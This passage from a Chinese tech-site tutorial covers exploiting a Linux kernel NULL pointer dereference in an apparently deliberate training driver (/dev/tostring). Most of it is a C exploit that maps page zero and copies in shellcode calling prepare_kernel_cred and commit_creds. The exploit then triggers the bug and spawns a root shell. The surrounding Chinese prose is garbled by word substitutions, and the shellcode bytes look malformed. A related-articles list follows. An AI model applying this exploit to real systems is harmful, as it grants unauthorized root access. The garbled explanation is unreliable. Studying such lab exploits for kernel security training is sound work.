read(fd, 0, 1) 

我们做到了，我们将其IP指针设置为0

荣幸的是，mmap_min_addr保护处于封闭状况。 我们可以在NULL平分派一个小区域，并放置我们的shellcode来晋升权限。

如今就可以大年夜“/proc/kallsyms!”中获得“prepare_kernel_cred”和“commit_creds”地址。

我将应用rasm2做一个shellcode：

以下是shellcode：

在我们的开辟法度榜样中撤消指针前，我们就可以开端添加shellcode：

#include <stdio.h> 
#include <string.h> 
#include <stdlib.h> 
#include <sys/mman.h> 
#include <fcntl.h> 
/**/ 
#define vulnerable_device "/dev/tostring" 
/**/ 
void pop_shell(){ 
system("sh"); 
} 
/**/ 
void main(void){ 
int fd; 
char payload[15]; 
char shellcode[15] = "\x31\xc0\xe8\xe9\x11\x07\xc1\xe8\x74\x0e\x07\xc1\xc3"; 
/**/ 
memset(payload, '*', 10); 
/**/ 
payload[10] = 'S'; 
payload[11] = 0; 
/**/ 
fd = open(vulnerable_device, O_RDWR); 
if(fd < 0){ 
printf("Couldn't open device!"); 
} 
write(fd, payload, 12); 
/**/ 
mmap(NULL, sizeof(shellcode), PROT_EXEC |PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS |MAP_FIXED, -1, 0); 
memcpy(NULL, shellcode, sizeof(shellcode)); 
/**/ 
read(fd, 0, 1); 
/**/ 
pop_shell(); 
} 

以下是root shell

欲望文┞仿能对大年夜家有所启发和赞助!

【编辑推荐】

1. 若何经由过程“限制治理权限”来保护您的企业？
2. 匡恩收集威望宣布“2016物联网安然申报”
3. PHP成为首个在内核中嵌入加密库的编程说话
4. HEVD内核马脚练习——陪Windows玩儿
5. 治理员权限的凭证安然马脚

　　推荐阅读

　　别不相信 大数据已经侵入到你生活的方方面面

沙龙晃荡 | 去哪儿、陌陌、ThoughtWorks在主动化运维中的实践！10.28不见不散！ 大年夜数据这个词，几乎天天都邑听到。不过谈到这个词典，要么是科技公司介绍新技巧、要么是专家学者介绍将>>>详细阅读

本文标题：内核exploit——如何应对空指针异常现象

地址：http://www.17bianji.com/lsqh/38226.html

 1/2    1